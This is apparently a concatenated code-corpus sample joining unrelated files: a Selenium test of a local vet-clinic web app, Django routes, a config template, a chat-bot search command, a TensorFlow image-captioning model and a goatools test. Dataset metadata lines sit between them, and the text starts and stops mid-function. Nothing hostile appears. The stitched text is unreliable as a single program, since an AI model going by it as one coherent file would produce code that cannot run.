value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
| 2.078125 | 2 |
Week6JamesNoonanAdv.py | WarpedDemon/Webtesting | 0 | 12795683 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.common.exceptions import NoSuchElementException
import time, math
class PageGetSet:
def __init__(self):
self.PET_OWNERS = 0
self.INVENTORY = 1
self.VETS = 2
self.VETS_DETAILS = 3
self.APPOINTMENTS = 4
self.PET_OWNER_DETAILS = 5
self.APPOINTMENT_DETAILS = 6
self.Browser = None
self.WorkElement = None
self.Pages = [
"PetOwners.aspx",
"Inventory.aspx",
"Vets.aspx",
"VetDetails.aspx",
"Appointments.aspx",
"PetOwnerDetails.aspx",
"AppointmentDetails.aspx"
]
self.Statistics = {
"success": 0,
"fail": 0,
"max": 0
}
self.CurrentPage = self.PET_OWNERS
self.InitializeBrowser("http://localhost:50452/" + self.Pages[self.CurrentPage])
self.RunCommands()
def InitializeBrowser(self, address):
self.Browser = webdriver.Firefox()
self.Browser.get(address)
def UpdateStatistics(self, status):
self.Statistics[status] += 1
self.Statistics["max"] += 1
def GetElementById(self, id):
try:
self.WorkElement = self.Browser.find_element_by_id(id)
return self.WorkElement
except NoSuchElementException:
return False
def SendKeysToElement(self, element, keys):
element.clear()
element.send_keys(keys)
def WaitForElementToExist(self, id):
WebDriverWait(self.Browser, 3).until(
expected_conditions.visibility_of_element_located(
(By.ID, id)
)
)
def SwitchToPage(self, pageID):
self.CurrentPage = pageID
self.Browser.get("http://localhost:50452/" + self.Pages[self.CurrentPage])
def ClickElement(self, element):
element.click()
def ClickElementById(self, elementId):
self.GetElementById(elementId).click()
def Sleep(self, length):
time.sleep(length)
def IfExistById(self, id):
try:
value = self.GetElementById(id)
if(value == False): return False
return True
except NoSuchElementException:
print("NO PAGE")
return False
def PetOwners(self):
print("Testing Pet Owners Start")
self.SwitchToPage(self.PET_OWNERS)
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Pet Owners Finish")
self.Sleep(3)
def PetOwnersDetails(self):
print("Testing Pet Owners Details Start")
self.SwitchToPage(self.PET_OWNER_DETAILS)
self.SendKeysToElement(self.GetElementById("txtFirstname"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtLastname"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtMobile"), "424-288-2000")
self.SendKeysToElement(self.GetElementById("txtEmail"), "<EMAIL>")
self.Browser.find_element_by_xpath("//input[@id='chkID']").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtPetName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtPetDOB"), "02/01/2023")
self.SendKeysToElement(self.GetElementById("txtPetType"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtPetBreed"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnAddPet']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
print("Testing Pet Owners Details Finish")
self.Sleep(3)
def Inventory(self):
print("Testing Inventory Start")
self.SwitchToPage(self.INVENTORY)
self.SendKeysToElement(self.GetElementById("txtName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtQuantity"), "50")
self.SendKeysToElement(self.GetElementById("txtCost"), "2.0")
self.SendKeysToElement(self.GetElementById("txtPrice"), "2.0")
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Inventory Finish")
self.Sleep(3)
def Vets(self):
print("Testing Vets Start")
self.SwitchToPage(self.VETS)
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Vets Finish")
self.Sleep(3)
def VetsDetails(self):
print("Testing Vets Details Start")
self.SwitchToPage(self.VETS_DETAILS)
self.SendKeysToElement(self.GetElementById("txtFirstName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtLastName"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtMobileNo"), "56675675")
self.SendKeysToElement(self.GetElementById("txtEmail"), "<EMAIL>")
self.SendKeysToElement(self.GetElementById("txtAddress"), "50 apple cross ave")
self.SendKeysToElement(self.GetElementById("txtPostcode"), "6023")
self.SendKeysToElement(self.GetElementById("txtSkills"), "BodyBuilder")
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.Browser.find_element_by_xpath("//option[@value='Feb']").click()
self.SendKeysToElement(self.GetElementById("txtSkills"), "BodyBuilder")
self.Browser.find_element_by_xpath("//input[@id='chkTue']").click()
self.Browser.find_element_by_xpath("//input[@id='btnAddAvailability']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
print("Testing Vets Details Finish")
self.Sleep(3)
def Appointments(self):
print("Testing Appointments Start")
self.SwitchToPage(self.APPOINTMENTS)
print("Testing Appointments Finish")
self.Sleep(3)
def AppointmentsDetails(self):
print("Testing Appointments Details Start")
self.SwitchToPage(self.APPOINTMENT_DETAILS)
self.SendKeysToElement(self.GetElementById("txtAppointmentDate"), "02/01/2023")
self.Browser.find_element_by_xpath("//select[@id='DropDownListHour']").click()
self.Browser.find_element_by_xpath("//option[@value='07']").click()
self.Browser.find_element_by_xpath("//select[@id='DropDownListMinute']").click()
self.Browser.find_element_by_xpath("//option[@value='45']").click()
self.SendKeysToElement(self.GetElementById("txtPaid"), "Cakes")
self.Browser.find_element_by_xpath("//input[@id='chkPaid']").click()
self.SendKeysToElement(self.GetElementById("txtComments"), "Cakes are tasty and good yis")
self.Browser.find_element_by_xpath("//div//div//div//table[@id='GridViewPets']//tbody//tr[2]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//div//div//div//table[@id='GridViewVets']//tbody//tr[2]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.Browser.find_element_by_xpath("//div[@id='Panel1']//div//div//tbody//tr[4]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//input[@id='txtQuantity']").click()
self.SendKeysToElement(self.GetElementById("txtQuantity"), "2")
self.Browser.find_element_by_xpath("//input[@id='btnAddMedication']").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtSearchPet"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchPet']").click()
self.SendKeysToElement(self.GetElementById("txtSearchVet"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchVet']").click()
self.SendKeysToElement(self.GetElementById("txtSearchInventory"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchInventory']").click()
print("Testing Appointments Details Finish")
self.Sleep(3)
def RunCommands(self):
self.PetOwners()
self.PetOwnersDetails()
self.Inventory()
self.Vets()
self.VetsDetails()
self.Appointments()
self.AppointmentsDetails()
self.Appointments()
print("---------------------------")
print("-- All Tests Complete --")
print("---------------------------")
pgs = PageGetSet() | 2.625 | 3 |
pages/urls.py | Garinmckayl/monet | 0 | 12795684 | from unicodedata import name
from accounts import views as account_views
from django.urls import path, reverse
from .views import (AboutPageView, AuctionCreateView, AuctionDetailView, AuctionListView, BidCreateView, BidDetailView,
DashboardPageView, DatasourceView, HomePageView, StripeConnectionView,MyAuctionDetailView,AuctionUpdateView)
urlpatterns = [
path('', HomePageView.as_view(), name='home'),
path('about/', AboutPageView.as_view(), name='about'),
path('dashboard/', DashboardPageView.as_view(), name='dashboard'),
path('auctions/', AuctionListView.as_view(), name='auctions'),
path('auction-detail/<int:pk>/', AuctionDetailView.as_view(), name='auction-detail'),
path('auctions/create/',AuctionCreateView.as_view(), name= 'auction-create'),
path('bids/create/',BidCreateView.as_view(), name= 'bid-create'),
path('bid-detail/<int:pk>/', BidDetailView.as_view(), name='bid-detail'),
path('stripe-connection/', StripeConnectionView.as_view(), name='stripe-connection'),
path('data-source/',DatasourceView.as_view(), name='data-source'),
path('dashboard/my-auction/', MyAuctionDetailView.as_view(),name='my-auction'),
path('auction-update/<int:pk>/',AuctionUpdateView.as_view(), name='auction-update'),
path('dashboard/company/my-company', account_views.MyCompanyDetailView.as_view(), name='my-company'),
path('dashboard/company/<int:pk>/', account_views.CompanyUpdateView.as_view(), name="company-update"),
path('dashboard/company/create/', account_views.CompanyCreateView.as_view(), name='company-create'),
path('dashboard/connect/', account_views.connect, name="connect"),
path('dashboard/my-account/', account_views.AccountDetailView.as_view(), name='my-account'),
]
| 1.929688 | 2 |
config.py | JamaSoftware/sync-status | 0 | 12795685 | <filename>config.py
# Connection Settings
JAMA_CONNECT_URL = "https://instance.jamacloud.com"
USERNAME = "USERNAME"
PASSWORD = "PASSWORD"
# If using oauth, set OAUTH = True, set USERNAME = "CLIENT_ID" and PASSWORD="<PASSWORD>"
OAUTH = False
# Input / Output settings
filter_id = 165
# Project's to check sync status against.
# This value should be a list ex: [14]
# To check against mutiple specified projects: ex: [15, 17]
# Use the empty list to check all against all projects ex: []
project_list = []
# if your filter is set to use 'Current Project' then you must supply a project_id. otherwise set to None
filter_project_id = None
# Enter the location for the output.
output_location = "./sync_status.csv"
# CSV Settings
# Output header row in CSV. Must be set to True or False
csv_header = True
# A one character string to separate values.
delimiter = ','
# Logging date time format
log_date_time_format = "%Y-%m-%d %H_%M_%S"
| 2.046875 | 2 |
modules/duckduckgo.py | dngfx/MagicBot | 1 | 12795686 | <reponame>dngfx/MagicBot
# --depends-on commands
from src import ModuleManager, utils
URL_DDG = "https://api.duckduckgo.com"
class Module(ModuleManager.BaseModule):
_name = "DDG"
@utils.hook("received.command.duckduckgo", alias_of="ddg")
@utils.hook("received.command.ddg", min_args=1)
def duckduckgo(self, event):
"""
:help: Get first DuckDuckGo result for a given search term
:usage: [search term]
"""
phrase = event["args"] or event["target"].buffer.get()
if phrase:
page = utils.http.request(
URL_DDG,
get_params={
"q": phrase,
"format": "json",
"no_html": "1",
"no_redirect": "1",
},
).json()
if page and page["AbstractURL"]:
event["stdout"].write(page["AbstractURL"])
else:
event["stderr"].write("No results found")
| 2.359375 | 2 |
src/__init__.py | hoaphumanoid/twitter_bot | 6 | 12795687 | <gh_stars>1-10
__title__ = 'Twitter bot'
__version__ = '1.0'
__author__ = '<NAME>'
__license__ = 'MIT license'
__copyright__ = 'Copyright 2016 <NAME>'
# Version synonym
VERSION = __version__ | 1.007813 | 1 |
log_group_subscriber/util.py | oslokommune/okdata-log-group-subscriber | 0 | 12795688 | <gh_stars>0
import os
def getenv(name):
"""Return the environment variable named `name`, or raise OSError if unset."""
env = os.getenv(name)
if not env:
raise OSError(f"Environment variable {name} is not set")
return env
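# Illustrative usage (the variable name is an assumption):
#   getenv("SERVICE_NAME")  # -> its value, or raises OSError("Environment variable SERVICE_NAME is not set")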
| 2.828125 | 3 |
base_model.py | chapternewscu/tensorflow_visual_attention | 0 | 12795689 | <gh_stars>0
import os
import sys
import json
import numpy as np
import pandas as pd
import tensorflow as tf
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from tqdm import tqdm
from dataset import *
from utils.words import *
from utils.coco.coco import *
from utils.coco.pycocoevalcap.eval import *
class ImageLoader(object):
def __init__(self, mean_file):
self.bgr = True
self.scale_shape = np.array([224, 224], np.int32)
self.crop_shape = np.array([224, 224], np.int32)
self.mean = np.load(mean_file).mean(1).mean(1)
def load_img(self, img_file):
""" Load and preprocess an image. """
img = cv2.imread(img_file)
if self.bgr:
temp = img.swapaxes(0, 2)
temp = temp[::-1]
img = temp.swapaxes(0, 2)
img = cv2.resize(img, (self.scale_shape[0], self.scale_shape[1]))
offset = (self.scale_shape - self.crop_shape) / 2
offset = offset.astype(np.int32)
img = img[offset[0]:offset[0]+self.crop_shape[0], offset[1]:offset[1]+self.crop_shape[1], :]
img = img - self.mean
return img
def load_imgs(self, img_files):
""" Load and preprocess a list of images. """
imgs = []
for img_file in img_files:
imgs.append(self.load_img(img_file))
imgs = np.array(imgs, np.float32)
return imgs
class BaseModel(object):
def __init__(self, params, mode):
self.params = params
self.mode = mode
self.batch_size = params.batch_size if mode=='train' else 1
self.cnn_model = params.cnn_model
self.train_cnn = params.train_cnn
self.init_lstm_with_fc_feats = params.init_lstm_with_fc_feats if self.cnn_model=='vgg16' else False
self.class_balancing_factor = params.class_balancing_factor
self.save_dir = os.path.join(params.save_dir, self.cnn_model+'/')
self.word_table = WordTable(params.vocab_size, params.dim_embed, params.max_sent_len, params.word_table_file)
self.word_table.load()
self.img_loader = ImageLoader(params.mean_file)
self.img_shape = [224, 224, 3]
self.global_step = tf.Variable(0, name = 'global_step', trainable = False)
self.build()
self.saver = tf.train.Saver(max_to_keep = 100)
def build(self):
raise NotImplementedError()
def get_feed_dict(self, batch, is_train, contexts=None, feats=None):
raise NotImplementedError()
def train(self, sess, train_coco, train_data):
""" Train the model. """
print("Training the model...")
params = self.params
num_epochs = params.num_epochs
for epoch_no in tqdm(list(range(num_epochs)), desc='epoch'):
for idx in tqdm(list(range(train_data.num_batches)), desc='batch'):
batch = train_data.next_batch()
if self.train_cnn:
# Train CNN and RNN
feed_dict = self.get_feed_dict(batch, is_train=True)
_, loss0, loss1, global_step = sess.run([self.opt_op, self.loss0, self.loss1, self.global_step], feed_dict=feed_dict)
else:
# Train RNN only
img_files, _, _ = batch
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=True, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=True, contexts=contexts)
_, loss0, loss1, global_step = sess.run([self.opt_op, self.loss0, self.loss1, self.global_step], feed_dict=feed_dict)
print(" Loss0=%f Loss1=%f" %(loss0, loss1))
if (global_step + 1) % params.save_period == 0:
self.save(sess)
train_data.reset()
self.save(sess)
print("Training complete.")
def val(self, sess, val_coco, val_data):
""" Validate the model. """
print("Validating the model ...")
results = []
result_dir = self.params.val_result_dir
# Generate the captions for the images
for k in tqdm(list(range(val_data.count))):
batch = val_data.next_batch()
img_files = batch
img_file = img_files[0]
img_name = os.path.splitext(img_file.split(os.sep)[-1])[0]
if self.train_cnn:
feed_dict = self.get_feed_dict(batch, is_train=False)
else:
img_files = batch
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts)
result = sess.run(self.results, feed_dict=feed_dict)
sentence = self.word_table.indices_to_sent(result.squeeze())
results.append({'image_id': val_data.img_ids[k], 'caption': sentence})
# Save the result in an image file
img = mpimg.imread(img_file)
plt.imshow(img)
plt.axis('off')
plt.title(sentence)
plt.savefig(os.path.join(result_dir, img_name+'_result.jpg'))
val_data.reset()
# Evaluate these captions
val_res_coco = val_coco.loadRes2(results)
scorer = COCOEvalCap(val_coco, val_res_coco)
scorer.evaluate()
print("Validation complete.")
def test(self, sess, test_data, show_result=False):
""" Test the model. """
print("Testing the model ...")
result_file = self.params.test_result_file
result_dir = self.params.test_result_dir
captions = []
# Generate the captions for the images
for k in tqdm(list(range(test_data.count))):
batch = test_data.next_batch()
img_files = batch
img_file = img_files[0]
img_name = os.path.splitext(img_file.split(os.sep)[-1])[0]
if self.train_cnn:
feed_dict = self.get_feed_dict(batch, is_train=False)
else:
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts)
result = sess.run(self.results, feed_dict=feed_dict)
sentence = self.word_table.indices_to_sent(result.squeeze())
captions.append(sentence)
# Save the result in an image file
img = mpimg.imread(img_file)
plt.imshow(img)
plt.axis('off')
plt.title(sentence)
plt.savefig(os.path.join(result_dir, img_name+'_result.jpg'))
# Save the captions to a file
results = pd.DataFrame({'image_files':test_data.img_files, 'caption':captions})
results.to_csv(result_file)
print("Testing complete.")
def save(self, sess):
""" Save the model. """
print(("Saving model to %s" % self.save_dir))
self.saver.save(sess, self.save_dir, self.global_step)
def load(self, sess):
""" Load the model. """
print("Loading model...")
checkpoint = tf.train.get_checkpoint_state(self.save_dir)
if checkpoint is None:
print("Error: No saved model found. Please train first.")
sys.exit(0)
self.saver.restore(sess, checkpoint.model_checkpoint_path)
def load2(self, data_path, session, ignore_missing=True):
""" Load a pretrained CNN model. """
print("Loading CNN model from %s..." %data_path)
data_dict = np.load(data_path).item()
count = 0
miss_count = 0
for op_name in data_dict:
with tf.variable_scope(op_name, reuse=True):
                for param_name, data in data_dict[op_name].items():
try:
var = tf.get_variable(param_name)
session.run(var.assign(data))
count += 1
#print("Variable %s:%s loaded" %(op_name, param_name))
except ValueError:
miss_count += 1
#print("Variable %s:%s missed" %(op_name, param_name))
if not ignore_missing:
raise
print("%d variables loaded. %d variables missed." %(count, miss_count))
| 2.375 | 2 |
mitty/plugins/population/vn.py | latticelabs/Mitty-deprecated- | 1 | 12795690 | """A population model that creates samples with more and more variants. Suitable for the aligner paper experiments
^ = intersection
E = subset
vx ^ v0 = v0
vx ^ v1 = v0
...
vx ^ vn = v0
v0 E v1
v1 E v2
v2 E v3
...
v(n-1) E vn
This plugin does not honor the site frequency spectrum model and ignores the original 'p' values
"""
import numpy as np
__example_param_text = """
{
"vn": {
"p_vx": 0.2,
"p_vn": [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7],
}
}
"""
_description = __doc__ + '\nExample parameters:\n' + __example_param_text
#_example_params = json.loads(__example_param_text)
_example_params = eval(__example_param_text)
class Model:
def __init__(self, p_vx, p_vn):
"""A population model that creates samples with more and more variants. Suitable for the aligner paper experiments
:param p_vx: probability value for vx set
:param p_vn: probability values for v0, v1, v2, v3 .... set
"""
self.p_vx, self.p_vn = p_vx, p_vn
def samples(self, chrom_no=None, ml=None, rng_seed=1, **kwargs):
"""This returns an iterator
:param chrom_no: number of the chromosome being considered [1,2,3 ...] (ignored here)
:param ml: VariantList. master list of variants as created by genomes program
:param rng_seed: seed for random number generators
:return: A generator returning (generation no, serial_no, chromosome, % samples done) for each sample in population
Algorithm: (Repeat for each chromosome copy)
Generate random numbers r same size as variants list
Select vx <= r < p_vx
Pick a random subset of v0 as v1 size(v1)/size(v0) = p_v1/p_v0
Set all r corresponding to v0 - v1 as 1.0 so we never select these again
Pick v2, v3 ... by comparing r to p_v2, p_v3 and so on
"""
assert 0 <= self.p_vx <= 1.0, 'p_vx needs to be >= 0 and <= 1.0'
assert self.p_vx > self.p_vn[0], 'p_vx needs to be > p_vn[0]'
for n in range(len(self.p_vn) - 1):
assert self.p_vn[n] < self.p_vn[n + 1], 'p_vn needs to be in ascending order'
assert 0 <= self.p_vn[n] <= 1.0, 'p_vn needs to be >= 0 and <= 1.0'
rng = np.random.RandomState(rng_seed)
r = rng.rand(ml.variants.shape[0], 2)
idx_vx = [None, None]
for cpy in [0, 1]:
idx_vx[cpy] = np.sort(rng.choice(ml.variants.shape[0], size=int(ml.variants.shape[0] * self.p_vx), replace=False))
# Take elements in vx that are not going to be in v0 completely out of circulation
r[idx_vx[cpy][(r[idx_vx[cpy]] >= self.p_vn[0]).nonzero()[0]], cpy] = 1.1
# Now all elements for r < 1.0 are either in vx ^ v0 or not in vx
for n in range(len(self.p_vn) + 1):
if n == 0:
this_idx, sample_name = idx_vx, 'vx'
else:
this_idx, sample_name = [(r[:, cpy] < self.p_vn[n - 1]).nonzero()[0] for cpy in [0, 1]], 'v{:d}'.format(n - 1)
yield sample_name, ml.zip_up_chromosome(*this_idx), float(n + 1) / self.get_sample_count_estimate()
def get_sample_count_estimate(self):
"""Give us an as exact as possible estimate of how many samples we will produce"""
return 1 + len(self.p_vn) | 2.890625 | 3 |
tests/test_gosubdag_relationships_i126.py | flying-sheep/goatools | 477 | 12795691 | #!/usr/bin/env python
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# tests/test_gosubdag_relationships_i126.py
# goatools/gosubdag/gosubdag.py
# goatools/gosubdag/godag_rcnt.py
# goatools/gosubdag/godag_rcnt_init.py
# goatools/godag/go_tasks.py
# goatools/obo_parser.py
from __future__ import print_function
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
from os.path import join
from os import system
import sys
## import timeit
## import datetime
import collections as cx
from goatools.base import get_godag
from goatools.godag.consts import RELATIONSHIP_SET
from goatools.gosubdag.gosubdag import GoSubDag
from goatools.test_data.wr_subobo import WrSubObo
from tests.utils import REPO
# pylint: disable=line-too-long,unused-variable
def test_gosubdag_relationships(wr_new_obo_subset=False):
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# Leaf GO: viral triggering of virus induced gene silencing
goid_chosen = 'GO:0060150'
# Load GODag with all relationships
fin_obo = join(REPO, "tests/data/i126/viral_gene_silence.obo") # "go-basic.obo")
godag_r0 = get_godag(fin_obo, loading_bar=None)
godag_r1 = get_godag(fin_obo, loading_bar=None, optional_attrs=['relationship'])
file_sub = join(REPO, "tests/data/viral_gene_silence.obo")
# Get all GO terms above this low-level GO ID using all relationships
if wr_new_obo_subset:
_wr_sub_obo(file_sub, goid_chosen, godag_r1, fin_obo)
# RELATIONSHIPS: None
gosubdag_r0 = GoSubDag(set([goid_chosen]), godag_r0)
assert len(gosubdag_r0.rcntobj.go2ancestors[goid_chosen]) == 12
# RELATIONSHIPS: ALL
gosubdag_r1 = GoSubDag(set([goid_chosen]), godag_r1, relationships=True)
assert gosubdag_r1.relationships == RELATIONSHIP_SET
#### set(['part_of', 'regulates', 'positively_regulates', 'negatively_regulates'])
assert len(gosubdag_r1.rcntobj.go2ancestors[goid_chosen]) == 50
# RELATIONSHIPS: part_of
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'})
assert gosubdag_rp.relationships == set(['part_of'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: regulates
gosubdag_rr = GoSubDag(set([goid_chosen]), godag_r1, relationships={'regulates'})
assert gosubdag_rr.relationships == set(['regulates'])
rp_par = gosubdag_rr.rcntobj.go2ancestors[goid_chosen]
# assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
# assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: positively_regulates
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'positively_regulates'})
assert gosubdag_rp.relationships == set(['positively_regulates'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: negatively_regulates
gosubdag_rn = GoSubDag(set([goid_chosen]), godag_r1, relationships={'negatively_regulates'})
assert gosubdag_rn.relationships == set(['negatively_regulates'])
rp_par = gosubdag_rn.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: regulates positively_regulates negatively_regulates
regs = {'positively_regulates', 'negatively_regulates'}
gosubdag_rnp = GoSubDag(set([goid_chosen]), godag_r1, relationships=regs)
assert gosubdag_rnp.relationships == regs
rp_par = gosubdag_rnp.rcntobj.go2ancestors[goid_chosen]
_run_baseline_r0(gosubdag_r0, gosubdag_r1)
# BASELINE r1: Test that GOTerm.get_all_upper() is the same as GoSubDag ancestors
for goid, term in gosubdag_r1.go2obj.items():
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r1 == term.get_all_upper()
#### # Test that
#### gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}, prt=sys.stdout)
#### for goid, dag_term in godag_r1.items():
#### if goid in gosubdag_r1.rcntobj.go2ancestors:
#### ancestors = gosubdag_rp.rcntobj.go2ancestors[goid]
#### sub_term = gosubdag_rp.go2obj[goid]
#### reldict = sub_term.relationship.items()
#### # print(goid)
#### # print('DAG', sorted(dag_term.get_all_upper()))
#### # print('SUB', sorted(sub_term.get_all_upper()))
#### # print('ANS', sorted(ancestors))
#### # for rel, pterms in cx.OrderedDict(reldict).items():
#### # print(rel, ' '.join(sorted(o.id for o in pterms)))
#### # print('')
#### print(gosubdag_rp.relationships)
#### #assert 'GO:0016441' not in gosubdag_rp.rcntobj.go2ancestors['GO:0060150']
#### assert 'GO:0016441' in gosubdag_r1.go2nt
#### assert 'GO:0010467' in gosubdag_r1.go2nt
def _run_baseline_r0(gosubdag_r0, gosubdag_r1):
"""BASELINE r0: Test that GOTerm.get_all_parents() == GoSubDag ancestors"""
r1_ancestors_more = set()
# Loop through r0 GO IDs
for goid, term in gosubdag_r0.go2obj.items():
ancestors_r0 = gosubdag_r0.rcntobj.go2ancestors.get(goid, set())
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r0 == term.get_all_parents()
assert ancestors_r0.issubset(ancestors_r1)
if len(ancestors_r0) < len(ancestors_r1):
r1_ancestors_more.add(goid)
assert r1_ancestors_more
print('{N} r1 GO terms in GoSubDag have more ancestors than r0'.format(
N=len(r1_ancestors_more)))
# scripts/go_plot.py --go_file=i126_goids_baseline.txt -r --obo=tests/data/viral_gene_silence.obo -o i126_goids_baseline.png
fout_gos = 'i126_goids_baseline.txt'
with open(fout_gos, 'w') as prt:
prt.write('#cafffb {SRC_GO}\n'.format(SRC_GO=next(iter(gosubdag_r0.go_sources))))
_prt_goterms(r1_ancestors_more, gosubdag_r1.go2nt, prt)
print(' WROTE: {GOs}'.format(GOs=fout_gos))
def _prt_goterms(goids, go2nt, prt):
"""Print details of GO terms"""
fmt = ('#ffd1df {GO} # {NS} {dcnt:5} {childcnt:3} '
'L{level:02} D{depth:02} R{reldepth:02} {D1:5} {REL} {rel} {GO_name}\n')
nts = [nt for go, nt in go2nt.items() if go in goids]
for ntd in sorted(nts, key=lambda nt: nt.dcnt, reverse=True):
prt.write(fmt.format(**ntd._asdict()))
#cafffb GO:0060150
#ffd1df GO:0050794 # BP 8278 64 D03 R03 regulation of cellular process
#ffd1df GO:0019222 # BP 3382 20 D03 R03 regulation of metabolic process
#ffd1df GO:0048522 # BP 2417 65 D04 R04 positive regulation of cellular process
#ffd1df GO:0060255 # BP 2130 20 D04 R04 regulation of macromolecule metabolic process
#ffd1df GO:0010468 # BP 862 20 D05 R05 regulation of gene expression
#ffd1df GO:0060968 # BP 53 4 D06 R08 regulation of gene silencing
#ffd1df GO:0060147 # BP 24 4 D07 R09 regulation of posttranscriptional gene silencing
#ffd1df GO:0060148 # BP 8 3 D08 R10 positive regulation of posttranscriptional gene silencing
#ffd1df GO:0060150 # BP 0 0 D09 R11 viral triggering of virus induced gene silencing
# - Generate GO DAG subset for this test ---------------------------------------------------------
def _wr_sub_obo(fout_obo, goid_chosen, godag_r1, fin_obo):
"""Sub plot used for visualizing this test file's elements"""
# Load GO-DAG: Load optional 'relationship'
godag = {go:o for go, o in godag_r1.items() if go == o.item_id}
_prt_rtel_ctr(godag)
rels_all = set(['part_of', 'regulates', 'negatively_regulates', 'positively_regulates'])
goids_leaf_all = set(o.id for o in godag.values() if not o.children)
gosubdag_r1 = GoSubDag(goids_leaf_all, godag, relationships=True, prt=sys.stdout)
goids_src_r1_all = _get_leafs_w_relsinhier(rels_all, gosubdag_r1)
gosubdag_r1.prt_goids(goids_src_r1_all)
# Pick one of the GO IDs as a source for the subset DAG
gosubdag_viral = GoSubDag({goid_chosen}, godag, relationships=True, prt=sys.stdout)
goids_viral = set(gosubdag_viral.go2obj.keys())
with open(fout_obo, 'w') as prt:
WrSubObo.prt_goterms(fin_obo, goids_viral, prt)
print('{N} GO IDs WROTE: {OBO}'.format(N=len(goids_viral), OBO=fout_obo))
# Plot obo subset
pat_r1 = '{REPO}/scripts/go_plot.py {GO} -o {PNG} -r'
pat_r0 = '{REPO}/scripts/go_plot.py {GO} -o {PNG}'
system(pat_r1.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r1.png'), GO=goid_chosen))
system(pat_r0.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r0.png'), GO=goid_chosen))
def _get_leafs_w_relsinhier(rels_usr, gosubdag_r1):
"""Get GO IDs that have all relationships up their hierarchy."""
gos_r1_relsinhier = set()
goids_leaf = set(o.id for o in gosubdag_r1.go2obj.values() if not o.children)
for goid in goids_leaf:
go_parents = gosubdag_r1.rcntobj.go2ancestors[goid]
rels = set(k for p in go_parents for k in gosubdag_r1.go2obj[p].relationship.keys())
if rels == rels_usr:
gos_r1_relsinhier.add(goid)
return gos_r1_relsinhier
def _prt_rtel_ctr(godag):
